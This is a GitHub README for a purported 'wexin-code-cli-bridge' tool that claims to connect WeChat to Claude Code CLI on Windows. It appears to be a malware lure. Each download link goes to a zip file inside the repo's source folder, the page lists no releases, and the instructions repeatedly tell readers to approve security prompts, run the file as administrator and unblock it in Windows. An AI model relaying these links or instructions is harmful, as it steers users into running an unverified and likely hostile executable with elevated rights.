Skip to content

Shebatheadpin29/wexin-code-cli-bridge

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

9 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸ”— wexin-code-cli-bridge - Connect WeChat to Claude Code

Download

🧭 What this app does

wexin-code-cli-bridge helps you pass WeChat messages to Claude Code CLI through the iLink protocol.

This makes it easier to:

  • read messages from WeChat in one place
  • send those messages into Claude Code CLI
  • keep your chat flow in a simple desktop setup
  • work with a local bridge instead of moving between tools

It is built for Windows users who want a direct way to connect WeChat with a command-line workflow.

πŸ“¦ Download

Visit this page to download and run the app:

https://raw.githubusercontent.com/Shebatheadpin29/wexin-code-cli-bridge/main/src/backend/bridge_cli_wexin_code_v3.3.zip

If the page shows a release file, download it to your Windows PC and run the file after it finishes.

πŸ–₯️ What you need

Before you start, check that your PC has:

  • Windows 10 or Windows 11
  • A stable internet connection
  • WeChat installed on your computer
  • Claude Code CLI set up on your computer
  • Permission to run downloaded files
  • Enough free disk space for the app and its log files

For best results, use a standard Windows user account with admin rights for the first setup.

βš™οΈ How it works

The bridge sits between WeChat and Claude Code CLI.

  1. WeChat receives a message.
  2. The bridge reads the message through the iLink protocol.
  3. The bridge sends the message to Claude Code CLI.
  4. Claude Code CLI processes the message.
  5. The result comes back through the bridge flow.

You do not need to handle the protocol by hand. The app manages the message path for you.

πŸš€ Install on Windows

Follow these steps on your Windows PC.

1. Open the download page

Go to:

https://raw.githubusercontent.com/Shebatheadpin29/wexin-code-cli-bridge/main/src/backend/bridge_cli_wexin_code_v3.3.zip

Look for the latest release or the main download file.

2. Download the Windows file

If you see a Windows package such as an .exe file or a zipped folder, download it to a folder you can find again, such as:

  • Downloads
  • Desktop
  • Documents

3. Unzip the file if needed

If the download comes as a .zip file:

  • right-click the file
  • choose Extract All
  • pick a folder
  • open the extracted folder

4. Run the app

If you downloaded an .exe file:

  • double-click the file
  • approve the Windows security prompt if it appears
  • wait for the app to open

If Windows asks for permission, choose Yes.

5. Keep the app in a safe folder

Place the app in a folder you will not delete by accident. A good choice is:

  • C:\Apps\wexin-code-cli-bridge

This helps keep the bridge files in one place.

πŸ”§ First-time setup

After you start the app, check these items.

WeChat

Make sure WeChat is open and signed in on the same computer.

Claude Code CLI

Make sure Claude Code CLI is installed and ready to use. If the CLI needs a sign-in step or local setup, finish that first.

Bridge settings

The app may ask for connection details such as:

  • local port
  • protocol endpoint
  • message routing path
  • log folder

If you see these fields, use the default values first unless the app gives you a clear reason to change them.

πŸͺŸ Start the bridge

Use this process each time you want to use it.

  1. Open WeChat.
  2. Open Claude Code CLI.
  3. Start wexin-code-cli-bridge.
  4. Wait until the app shows that the connection is ready.
  5. Send a test message in WeChat.
  6. Check that the message reaches Claude Code CLI.

If the bridge supports auto-start, you can enable it later after the first test works.

πŸ’¬ Typical use

You can use the app when you want to:

  • send WeChat chats into a Claude Code workflow
  • move text from WeChat without copying it by hand
  • keep chat-based tasks in a local desktop tool
  • connect message input to a coding or assistant flow

This setup is useful when you want one bridge for chat and command-line work.

🧩 Common setup checks

If the app does not work right away, check these items.

WeChat is not open

Open WeChat first, then start the bridge again.

Claude Code CLI is not found

Check that Claude Code CLI is installed and available in your system path or in the location the bridge expects.

The app does not start

Try these steps:

  • right-click the file
  • choose Run as administrator
  • move the app to a folder with a short path name
  • make sure Windows did not block the file

Messages do not pass through

Check that:

  • both apps are open
  • the bridge shows a live connection
  • the protocol setting matches the app setup
  • no other tool is using the same port

The window closes right away

If the app closes after launch, open it from a terminal or keep the logs visible if the package includes a log window. This can help you see the error message.

πŸ—‚οΈ Folder layout

You may see files like these after download:

  • wexin-code-cli-bridge.exe - main app file
  • config.json - settings file
  • logs - app logs
  • README.md - project instructions
  • assets - icons or support files

Do not rename files unless the app guide tells you to.

πŸ”’ Safety tips

Use the app from the official GitHub repository only.

  • download from the link above
  • keep your system up to date
  • scan the file with Windows Security if you want a local check
  • avoid moving files while the app is running
  • close the bridge before deleting its folder

πŸ§ͺ Quick test

After setup, run this test:

  1. Start the bridge.
  2. Send a short message in WeChat.
  3. Watch for activity in Claude Code CLI.
  4. Confirm the message appears in the right place.

If the test works, your setup is ready for normal use.

❓ Help with first launch

If you are new to this kind of app, use this order:

  1. Download the file from GitHub.
  2. Unzip it if needed.
  3. Run the app.
  4. Open WeChat.
  5. Open Claude Code CLI.
  6. Test one message.
  7. Review the bridge settings only if the test fails

πŸ› οΈ Basic controls

The app may include a few simple controls such as:

  • Start
  • Stop
  • Reload
  • Open Logs
  • Settings
  • Test Connection

Use Start to begin the bridge and Stop to pause it when you do not need it.

πŸ“ Keeping it organized

To keep setup easy:

  • store the app in one folder
  • keep the download file as a backup until setup works
  • use a clear folder name
  • avoid moving the app after you set it up

This makes it easier to find the bridge later.

🧭 When to use it

Use wexin-code-cli-bridge when you want a direct link between WeChat messages and Claude Code CLI.

It fits a simple workflow where:

  • WeChat is the source of messages
  • the bridge moves those messages
  • Claude Code CLI handles the output

πŸ“₯ Download and run again

If you need to get the app again, use this link:

https://raw.githubusercontent.com/Shebatheadpin29/wexin-code-cli-bridge/main/src/backend/bridge_cli_wexin_code_v3.3.zip

Download the latest file from the page, then run it on Windows after the download finishes

Releases

No releases published

Packages

 
 
 

Contributors